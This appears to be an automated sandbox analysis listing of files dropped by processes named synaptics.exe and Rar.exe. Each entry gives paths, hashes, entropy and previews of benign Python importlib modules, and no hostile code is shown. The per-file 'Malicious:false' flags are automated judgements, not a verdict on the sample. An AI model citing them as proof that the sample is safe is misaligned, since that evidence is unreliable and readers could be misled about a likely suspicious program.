                                                                                                                                                                                                                                  Preview:o........'-d.:.......................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.y...Z...z.e.j.d.k.r"..d.Z.W.Y.d.Z.[.n.d.Z.[.w.w.z.d.d.l.Z.W.n...e.y@......e.Z.Y.n.w.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d...Z.G.d.d...d.e.j.d...Z.G.d.d...d.e.j.d...Z.e.e.e.j.e.j.e.j.e.j.....G.d.d...d.e.j.d...Z.e.e.e.j.....G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.e.j.e.j.....G.d.d...d.e...Z.e.e.e.j ....G.d.d...d.e.j!e.e...Z!e.e!e.j"e.j#....G.d.d...d.e.j$e.e...Z$e.e$e.j"....G.d.d...d.e.j.d...Z%e.G.d.d ..d e.....Z&G.d!d"..d"e%..Z'd.S.)#z(Abstract base classes related to import......)..._bootstrap_external)...machinery.....N.._frozen_importlib)...Loader)...BinaryIO..Iterable..Text)...Protocol..runtime_checkablec....................G...sZ...|.D.](}.|...|.....t.d.u.r*z.t.t.|.j...}.W.n...t.y$......t.t.|.j...}.Y.n.w.|...|.....q.d.S...N)...registerr......getattr..__name__..AttributeError.._frozen_importlib_external).Z.abstract_clsZ.classes..clsZ.frozen_cls..r...../C:\Users\Public
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):955
                                                                                                                                                                                                                                  Entropy (8bit):5.424660826253513
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:UjoXT16iGMJgQFpAquj8G4ZA+uXsrmH58K:UeG0OquCrcsr3K
                                                                                                                                                                                                                                  MD5:D3982E3E74C7786E06F7725D9B1686E1
                                                                                                                                                                                                                                  SHA1:5160E83451EFD289B49B66E334A3F5538B46F740
                                                                                                                                                                                                                                  SHA-256:67A297408E33CE061F73392CB64C9EE60C33BE1642CB48AAE49D720D1A758D56
                                                                                                                                                                                                                                  SHA-512:5D844A09D281BFD3250A4BDD3D88FBB2CD1AEE25B06497583F82C1E68C0FA2E263DEB0756E8BAD9120C971E0A299D423193DD612D7818696B06E0D8D4359BDFF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dR........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.S.).z9The machinery of importlib: finders, loaders, hooks, etc......)...ModuleSpec)...BuiltinImporter)...FrozenImporter)...SOURCE_SUFFIXES..DEBUG_BYTECODE_SUFFIXES..OPTIMIZED_BYTECODE_SUFFIXES..BYTECODE_SUFFIXES..EXTENSION_SUFFIXES)...WindowsRegistryFinder)...PathFinder)...FileFinder)...SourceFileLoader)...SourcelessFileLoader)...ExtensionFileLoaderc....................C...s....t.t...t...S.).zAReturns a list of all recognized module suffixes for this process).r....r....r......r....r.....5C:\Users\Public\M20EKMMEH2\lib\importlib\machinery.py..all_suffixes....s......r....N)...__doc__.._bootstrapr....r....r......_bootstrap_externalr....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r......<module>....s............................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5193
                                                                                                                                                                                                                                  Entropy (8bit):4.877838200921494
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:yPvjoTQ1zsquRgowzdmCbBavWMPTjTzKuhXBoPTl906kEt7IQ7ClEXsjMptAWrxB:pQ1ztyvedlbB7IruuhXBoPTlK9EhIQOi
                                                                                                                                                                                                                                  MD5:D032C4899CEF031E1E20364F80E5BE04
                                                                                                                                                                                                                                  SHA1:4309F1F9E5FD88FA6CCD0268FA7A675FE82FA275
                                                                                                                                                                                                                                  SHA-256:A0BFF449E03158027A5186D129FB62E59FF4A26BF947A12DFFBC96B209B8A4C3
                                                                                                                                                                                                                                  SHA-512:E1C92E6CB804CF18AE497A7BD41E69B292CEF1B140DB0F44FECD5CAC2095B64745C45586AFF0C50616132C0CD2BCBE96887F22134E685335A30EA74D766F3E5E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d~........................@...sx...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.)......N.....)...abcc....................C...s....t.t.j...|.....S...N)...iter..collections..OrderedDict..fromkeys)...items..r.....3C:\Users\Public\M20EKMMEH2\lib\importlib\readers.py..remove_duplicates...........r....c....................@....$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...FileReaderc....................C...s....t...|.j...j.|._.d.S.r....)...pathlib..Path..path..parent)...self..loaderr....r....r......__init__....s......z.FileReader.__init__c....................C........t.|.j...|.....S...z{. Return the file system path to prevent. `resources.path()` from creating a temporary. copy.. ....strr......joinpath..r......resourcer....r....r......resource_path...........z.FileReader.resource_pathc....................C........|.j.S.r......r......r....r....r....r......files...........z.FileReade
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5380
                                                                                                                                                                                                                                  Entropy (8bit):5.342626389196693
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:ozYSudPIqJNGeMzW9dlfxVoD0JJgFGx6qjBfjO6y3SnKL49oNhbMrhKgTlv:oJBnS9xVOSJgGx6AjI3SKyhRTlv
                                                                                                                                                                                                                                  MD5:E9819C62E5380010C647997624E64750
                                                                                                                                                                                                                                  SHA1:FD89584CEF8667C7AFA03515BB8975361943CE8B
                                                                                                                                                                                                                                  SHA-256:E0AEE6D3768A8C96A41D45D3316DC0A9B0439AC6469E5A62674CDACE26F70530
                                                                                                                                                                                                                                  SHA-512:50D7A4C0483BA42C1A898DAB94E2AD5CD7D356878F06F4043D351980C6F1E757E40EB746FD331511F1BBA2CAFE454EF689F5F9723226BE716A026E2AFD7124EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z e.e!e.f...Z"e.e!e.j#f...Z$d.e"d.e$d.e.f.d.d...Z%....d3d.e"d.e$d.e!d.e!d.e.f.d.d...Z&d.e"d.e$d.e'f.d.d...Z(....d3d.e"d.e$d.e!d.e!d.e!f.d.d ..Z)d.e"d.e$d.d!f.d"d#..Z*d$d%..Z+d&d'..Z,d(d)..Z-d.e"d*e!d.e.f.d+d,..Z/d.e"d.e.e!..f.d-d...Z0e.d/d0....Z1e1.2e...d1d2....Z3d.S.)4.....N.....)..._common)...as_file..files)...ResourceReader)...suppress)...ResourceLoader)...ModuleSpec)...BytesIO..TextIOWrapper)...Path)...ModuleType)...ContextManager..Iterable..Union)...cast)...BinaryIO..TextIO)...Sequence)...singledispatch)...Package..Resourcer....r......contentsr......is_resource..open_binary..open_text..path..read_binary..read_text..package..resource..returnc....................C...s&...t...|...}.t...|...}.t...|...}.|.d.u.r.|...|...S.t.t.|.j...}.|
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9340
                                                                                                                                                                                                                                  Entropy (8bit):5.32111882168594
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Tpt6ll1YVqQzvbab+Q3+LbcwE5lFz0w7/RhZT:FUl1YVqoeb+QuLbpmFz06RhZT
                                                                                                                                                                                                                                  MD5:2AD1B91E7EABADB7BF6B2A7C7D917AA3
                                                                                                                                                                                                                                  SHA1:B5DA557C3B29718AEDAE4845337C3E1D829B27BF
                                                                                                                                                                                                                                  SHA-256:787D87EB1CDE77D2957760B83A0DA8D308102C0DC87A951C6B457410B2470451
                                                                                                                                                                                                                                  SHA-512:28D32D720812009B941D3447EECEEE9B7805000E2EB98AC13FAAB6A003B6BE1FB572D3EDA39BC5FAACC9B34DB5EB25249CB01DE838C0DA80BB4F4AD59EA3DC8D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s*...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d$d.d...Z.d$d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z d.S.)%z-Utility code for constructing importers, etc......)...Loader)...module_from_spec)..._resolve_name)...spec_from_loader)..._find_spec)...MAGIC_NUMBER)..._RAW_MAGIC_NUMBER)...cache_from_source)...decode_source)...source_from_cache)...spec_from_file_location.....)...contextmanagerNc....................C...s....t...t.|...S.).zBReturn the hash of *source_bytes* as used in hash-based pyc files.)..._imp..source_hashr....)...source_bytes..r.....0C:\Users\Public\M20EKMMEH2\lib\importlib\util.pyr........s......r....c....................C...s\...|...d...s.|.S.|.s.t.d.t.|.....d.......d.}.|.D.].}.|.d.k.r...n.|.d.7.}.q.t.|.|.d.....|.|...S.).z2Resolve a relati
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1906
                                                                                                                                                                                                                                  Entropy (8bit):4.433036910849268
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:7+Sd1gyYp8ImdaCtl27fisRiqITfqF6BSES5C+LOqqc8vbBLlZvI/iWnWuPQ:CS0207fisQqgqF2SEqxStLlhIqWW
                                                                                                                                                                                                                                  MD5:CBCCC8E431A338F393CCD4D3F244CCC5
                                                                                                                                                                                                                                  SHA1:77FF0ADCB6F35D675030BEC62BB55AA076692037
                                                                                                                                                                                                                                  SHA-256:C4376232DA9464A27B02A530473489486D570F25A063715F3AD5A24D92FFE527
                                                                                                                                                                                                                                  SHA-512:27F28525A50F068F9327613AE5A71FAE25984292ED9CDEDF92B93E9DE4E00E8121BD397E34C7E728E5849289285677ED88C43F6AB6EFB60DA36331E9C2E6CC0C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Subset of importlib.abc used to reduce importlib.util imports."""..from . import _bootstrap..import abc..import warnings......class Loader(metaclass=abc.ABCMeta):.... """Abstract base class for import loaders.""".... def create_module(self, spec):.. """Return a module to initialize and into which to load..... This method should raise ImportError if anything prevents it.. from creating a new module. It may return None to indicate.. that the spec should create the new module... """.. # By default, defer to default semantics for the new module... return None.... # We don't define exec_module() here since that would break.. # hasattr checks we do to support backward compatibility..... def load_module(self, fullname):.. """Return the loaded module..... The module must be added to sys.modules and have import-related.. attributes set properly. The fullname is a str..... ImportError is raised on fa
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1991
                                                                                                                                                                                                                                  Entropy (8bit):4.390505646801514
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:0i644hrdO2kdSNH1UKetWEeF6kKznFEjRWOem++bPnn3kVqf:B644hrU2kwDL16kGCVWOHNznMqf
                                                                                                                                                                                                                                  MD5:5C775988B17A8E77726D985B2FE1284C
                                                                                                                                                                                                                                  SHA1:DC9FA37CDF9F1EC1045B16BEE536C1D54C488539
                                                                                                                                                                                                                                  SHA-256:F338A91DEEF0B819B408D7BAEA338D637B817A69B3270A6608ACF79EF9ED700A
                                                                                                                                                                                                                                  SHA-512:A88F3248FA18787B4D98F50EADC5DED6AC4D7B09A8B618C1CE8D440A3FC2B28B8DE00AAAE8338840549C77F92E01F6D12F02C4940FD350BC96EE2AE041E12DCA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from contextlib import suppress....from . import abc......class SpecLoaderAdapter:.. """.. Adapt a package spec to adapt the underlying loader... """.... def __init__(self, spec, adapter=lambda spec: spec.loader):.. self.spec = spec.. self.loader = adapter(spec).... def __getattr__(self, name):.. return getattr(self.spec, name)......class TraversableResourcesLoader:.. """.. Adapt a loader to provide TraversableResources... """.... def __init__(self, spec):.. self.spec = spec.... def get_resource_reader(self, name):.. return DegenerateFiles(self.spec)._native()......class DegenerateFiles:.. """.. Adapter for an existing or non-existant resource reader.. to provide a degenerate .files()... """.... class Path(abc.Traversable):.. def iterdir(self):.. return iter(()).... def is_dir(self):.. return False.... is_file = exists = is_dir # type: ignore.... def joinpa
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):42676
                                                                                                                                                                                                                                  Entropy (8bit):4.491854158137825
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:1eKvy2ADZIwUMAfvkUFlXppkl89q/5R5B/miJ5j2:DDCUdfvkUC72
                                                                                                                                                                                                                                  MD5:03A827AAC6D6D4EBEA01D384EAA30F32
                                                                                                                                                                                                                                  SHA1:81ADE09B0AEADF4B2721F56BE11E75E453192B45
                                                                                                                                                                                                                                  SHA-256:B300CE18C15FD539F099883AEDC24B1A91E5C35B581EFDBB9E21D638A4EC82E5
                                                                                                                                                                                                                                  SHA-512:B0B3BA998638A3CF0C8A8DF4D9B678FBF4D92AC387064151A6D7DF3179103CC5B4C417146CEF6D3E1120658672807AA89BC92867DF7A7C7022DD26A6FF361A80
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Core implementation of import.....This module is NOT meant to be directly imported! It has been designed such..that it can be bootstrapped into Python as the implementation of import. As..such it requires the injection of specific modules and attributes in order to..work. One should use importlib as the public-facing version of this module....."""..#..# IMPORTANT: Whenever making changes to this module, be sure to run a top-level..# `make regen-importlib` followed by `make` in order to get the frozen version..# of the module updated. Not doing so will result in the Makefile to fail for..# all others who don't have a ./python around to freeze the module..# in the early stages of compilation...#....# See importlib._setup() for what is injected into the global namespace.....# When editing this code be aware that code executed at import time CANNOT..# reference any injected objects! This includes not only global code but also..# anything specified at the class level.....def _object_name
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66536
                                                                                                                                                                                                                                  Entropy (8bit):4.677552891760068
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:iKsoAmFqJ4QFhE/tn5k0feP1tO4o4MCxl6knccZ/76RlgSHvflx3ov:txc4QF8tn5yM4B6kccZzILP+
                                                                                                                                                                                                                                  MD5:B6ED9264CB6BA04A6F439723C05F3072
                                                                                                                                                                                                                                  SHA1:0B8B9604896114FE1F5FB76087BAADCFED21D334
                                                                                                                                                                                                                                  SHA-256:CD9B77650B59135A764C6A536151673D4130BD88C9171223376D19CE5B971B77
                                                                                                                                                                                                                                  SHA-512:384439A20C07A730CFB4E8DAB9793D726157DF2760A3D4A6C95C3F9E02DEC52EF1FCB500D1CC9E5386D705FAB4091F4EBA2848BD2055F51D7F7F44C7DB66C084
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Core implementation of path-based import.....This module is NOT meant to be directly imported! It has been designed such..that it can be bootstrapped into Python as the implementation of import. As..such it requires the injection of specific modules and attributes in order to..work. One should use importlib as the public-facing version of this module....."""..# IMPORTANT: Whenever making changes to this module, be sure to run a top-level..# `make regen-importlib` followed by `make` in order to get the frozen version..# of the module updated. Not doing so will result in the Makefile to fail for..# all others who don't have a ./python around to freeze the module in the early..# stages of compilation...#....# See importlib._setup() for what is injected into the global namespace.....# When editing this code be aware that code executed at import time CANNOT..# reference any injected objects! This includes not only global code but also..# anything specified at the class level.....# Module
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3340
                                                                                                                                                                                                                                  Entropy (8bit):4.6745746844172285
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:C15GjAcQmz/EgZIyHf4Dd2juC6cO2HEzIX9SkqR8E:CowI/VLf452t6aHEzIX9S1R8E
                                                                                                                                                                                                                                  MD5:97023E935E8C794384CC5651D2A64F28
                                                                                                                                                                                                                                  SHA1:67B8407421BC914FDEC799FF161D4131454ED372
                                                                                                                                                                                                                                  SHA-256:F2ED6530F455FA56E1BCF69BB85553D72B2013933624533AFA69A874EB67AE00
                                                                                                                                                                                                                                  SHA-512:A0B82EF0EAA82D2F91763648086EE4046D7149BC2E3FA3A34A52A381CE8CD9BEBA5DBADBE71A9BFA012B239B849F403B092D3B0A90F542C6D0CEBD3D603804C4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import pathlib..import tempfile..import functools..import contextlib..import types..import importlib....from typing import Union, Any, Optional..from .abc import ResourceReader, Traversable....from ._adapters import wrap_spec....Package = Union[types.ModuleType, str]......def files(package):.. # type: (Package) -> Traversable.. """.. Get a Traversable resource from a package.. """.. return from_package(get_package(package))......def normalize_path(path):.. # type: (Any) -> str.. """Normalize a path by ensuring it is a string..... If the resulting string contains path separators, an exception is raised... """.. str_path = str(path).. parent, file_name = os.path.split(str_path).. if parent:.. raise ValueError(f'{path!r} must be only a file name').. return file_name......def get_resource_reader(package):.. # type: (types.ModuleType) -> Optional[ResourceReader].. """.. Return the package's loader if it's a ResourceReader...
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14863
                                                                                                                                                                                                                                  Entropy (8bit):4.500827376021012
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:JL/+/DsHY+mmxtRIE8O1gIjyyroF8M1470fY7GTDHv+RI+oe+:RGMY+mg9dyqMw7Esu
                                                                                                                                                                                                                                  MD5:1C219A984C22F7CEFDF4658FF6F7717A
                                                                                                                                                                                                                                  SHA1:C4C4B39D02F10989A0256612C59E8E35B808D99C
                                                                                                                                                                                                                                  SHA-256:03060C6B437D5268556E45EC50A89B25FF2DBBB393695611046BE776233BD568
                                                                                                                                                                                                                                  SHA-512:EEEA7E1582181A408A34F2BA2B6AA8ABCFDFC37C86ABF109CBD6233FEF68FB65724659857F426D41DA50D48B36E81D736BF5E16CC8FFFEF55F7EF628634BB4BD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Abstract base classes related to import."""..from . import _bootstrap_external..from . import machinery..try:.. import _frozen_importlib..except ImportError as exc:.. if exc.name != '_frozen_importlib':.. raise.. _frozen_importlib = None..try:.. import _frozen_importlib_external..except ImportError:.. _frozen_importlib_external = _bootstrap_external..from ._abc import Loader..import abc..import warnings..from typing import BinaryIO, Iterable, Text..from typing import Protocol, runtime_checkable......def _register(abstract_cls, *classes):.. for cls in classes:.. abstract_cls.register(cls).. if _frozen_importlib is not None:.. try:.. frozen_cls = getattr(_frozen_importlib, cls.__name__).. except AttributeError:.. frozen_cls = getattr(_frozen_importlib_external, cls.__name__).. abstract_cls.register(frozen_cls)......class Finder(metaclass=abc.ABCMeta):.... """Legacy abstract base cl
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):850
                                                                                                                                                                                                                                  Entropy (8bit):4.966782780310052
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:YT166asGSaopamPQpaJ2XEaJ2QaJLYaJRaJnaJiaJen5Jir:2VGSD0y20y2QyLYyRynyiy25Jir
                                                                                                                                                                                                                                  MD5:AC4151821693C881CEF5C5567EE36977
                                                                                                                                                                                                                                  SHA1:98C415AF4EECD5832ACD4DCA3FE2DBC220CE4B02
                                                                                                                                                                                                                                  SHA-256:1B8C62B3A0494C064B37D1812F3A67A475B874A383C937665C6DD66FCDC8F7B1
                                                                                                                                                                                                                                  SHA-512:1F2E8AA728F1EFF0A7AAE5D6B574D91CF3724BC49D5B4AEEB2E3CB53BD997A92A2E9C5CDBC5ACC052D5F0EA96FBF2626509C23E6E8BCC8183140D5FFD09070FD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""The machinery of importlib: finders, loaders, hooks, etc."""....from ._bootstrap import ModuleSpec..from ._bootstrap import BuiltinImporter..from ._bootstrap import FrozenImporter..from ._bootstrap_external import (SOURCE_SUFFIXES, DEBUG_BYTECODE_SUFFIXES,.. OPTIMIZED_BYTECODE_SUFFIXES, BYTECODE_SUFFIXES,.. EXTENSION_SUFFIXES)..from ._bootstrap_external import WindowsRegistryFinder..from ._bootstrap_external import PathFinder..from ._bootstrap_external import FileFinder..from ._bootstrap_external import SourceFileLoader..from ._bootstrap_external import SourcelessFileLoader..from ._bootstrap_external import ExtensionFileLoader......def all_suffixes():.. """Returns a list of all recognized module suffixes for this process""".. return SOURCE_SUFFIXES + BYTECODE_SUFFIXES + EXTENSION_SUFFIXES..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):31653
                                                                                                                                                                                                                                  Entropy (8bit):4.600545092713191
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:LAYScdWiMmMXy0TgP/eBSebWeLYfu51vlAB51Hvd8WgT0Tt/B7GFn6+hwYgEm+Z:LPSVmMXy4g0H1vAvvdm4rSPwybZ
                                                                                                                                                                                                                                  MD5:A6634294230146390C6551589BE95CD7
                                                                                                                                                                                                                                  SHA1:D6A8337B5227634D41CF53E735DF749C3C531166
                                                                                                                                                                                                                                  SHA-256:306A3AD3820533FDE313CBEA0BB8840D5DEF6455D16F39F76D6B9CDA91918DEE
                                                                                                                                                                                                                                  SHA-512:2A8533F9AE86CB520015F0426C28727857912D6CC253A4BEBCC64AC51B91CB9D4A4624807D29ABF2F20ADFE14ACAA61F7BC47EAECD301230515129AF694207BE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import re..import abc..import csv..import sys..import email..import pathlib..import zipfile..import operator..import textwrap..import warnings..import functools..import itertools..import posixpath..import collections....from . import _adapters, _meta..from ._meta import PackageMetadata..from ._collections import FreezableDefaultDict, Pair..from ._functools import method_cache, pass_none..from ._itertools import unique_everseen..from ._meta import PackageMetadata, SimplePath....from contextlib import suppress..from importlib import import_module..from importlib.abc import MetaPathFinder..from itertools import starmap..from typing import List, Mapping, Optional, Union......__all__ = [.. 'Distribution',.. 'DistributionFinder',.. 'PackageMetadata',.. 'PackageNotFoundError',.. 'distribution',.. 'distributions',.. 'entry_points',.. 'files',.. 'metadata',.. 'packages_distributions',.. 'requires',.. 'version',..]......class PackageNotFoundError(Mo
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37107
                                                                                                                                                                                                                                  Entropy (8bit):5.211809166503817
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:u6MjZ3JEQWRwd2Aj+j5HlBqOVKpmtI5FugF0Mj:u6cAL9BANHcgFRj
                                                                                                                                                                                                                                  MD5:19656B37BE2FA7C5843530E618BA9FDD
                                                                                                                                                                                                                                  SHA1:BFE69A6EBDA7EDF526ACAF27FCB9A619B5619A02
                                                                                                                                                                                                                                  SHA-256:8E32725A861395D05E8848808063FD7120D2BF2A7F737F8CECB09750803FE289
                                                                                                                                                                                                                                  SHA-512:4A6C02CA19E9108E3F94542BDF740FC12AB1ABEC3D5F3294ACD2A1B4B004F2CB55C34D297DD66D9A5C7EBD5F32EEF229FBFEFB4D82E545CFEF0F7487D12019DE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.{.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l.m"Z"..d.d.l#m$Z$m%Z%m&Z&m'Z'..g.d...Z(G.d.d...d.e)..Z*G.d.d...d...Z+G.d.d...d.e..,d.d.....Z-G.d.d...d.e...Z/G.d.d...d.e/..Z0G.d.d...d...Z1G.d.d...d.e1e2..Z3G.d.d ..d e.j4..Z5G.d!d"..d"..Z6G.d#d$..d$..Z7G.d%d&..d&e!..Z8G.d'd(..d(..Z9G.d)d*..d*..Z:G.d+d,..d,..Z;G.d-d...d.e8..Z<G.d/d0..d0e7..Z=d1d2..Z>d3d4..Z?d5e.j.f.d6d7..Z@d8d9..ZAd5e'e0e3f...f.d:d;..ZBd<d=..ZCd>d?..ZDd5e%eEe$eE..f...f.d@dA..ZFd.S.)B.....N.....)..._adapters.._meta)...PackageMetadata)...FreezableDefaultDict..Pair)...method_cache..pass_none)...unique_everseen).r......SimplePath)...suppress)...import_module)...MetaPathFinder)...starmap)...List..Mapping..Optional..Union)...Distribution..DistributionFinderr......PackageNotFoundError..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2355
                                                                                                                                                                                                                                  Entropy (8bit):5.15741278545636
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:2NuvHOKjDYXocKHdq5UHdUktPdSNwplt9SDYvloUTG:nHOKqocKHdqUdUWlSWplZ9oEG
                                                                                                                                                                                                                                  MD5:6D7E95ED715597B094B972B663428882
                                                                                                                                                                                                                                  SHA1:1796319A45EFFB589F59DF400D58B8A122BE0667
                                                                                                                                                                                                                                  SHA-256:F56545F50732839C701CBBE24287EE8664BD3EA44A66A7D7C651E9599A265F4A
                                                                                                                                                                                                                                  SHA-512:7F866DAA883A3605C68EFA9593BCE0BF469DAFAF2C3210683CD6F878ED572CEAC86A4D782175B61732410BAD69F3E5626C87B6C68B320B852A1F9993D8ABE809
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s<...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e.j.j...Z.d.S.)......N.....)...FoldedCasec........................sb...e.Z.d.Z.e.e.e.g.d.......Z...d.e.j.j.f...f.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e.d.d.....Z.....Z.S.)...Message).Z.Classifierz.Obsoletes-DistZ.Platformz.Project-URLz.Provides-Distz.Provides-Extraz.Requires-Distz.Requires-Externalz.Supported-PlatformZ.Dynamic..origc........................s"...t.....|...}.t.|.....t.|.......|.S...N)...super..__new__..vars..update)...clsr......res....__class__...>C:\Users\Public\M20EKMMEH2\lib\importlib\metadata\_adapters.pyr........s..........z.Message.__new__c....................O...s....|.....|._.d.S.r....)..._repair_headers.._headers)...self..args..kwargsr....r....r......__init__#...s......z.Message.__init__c........................s....t.......S.r....).r......__iter__..r....r....r....r....r....'...s......z.Message.__iter__c........................s>...d.d.......f.d.d...t.|...d...D...}.|.j.r.|
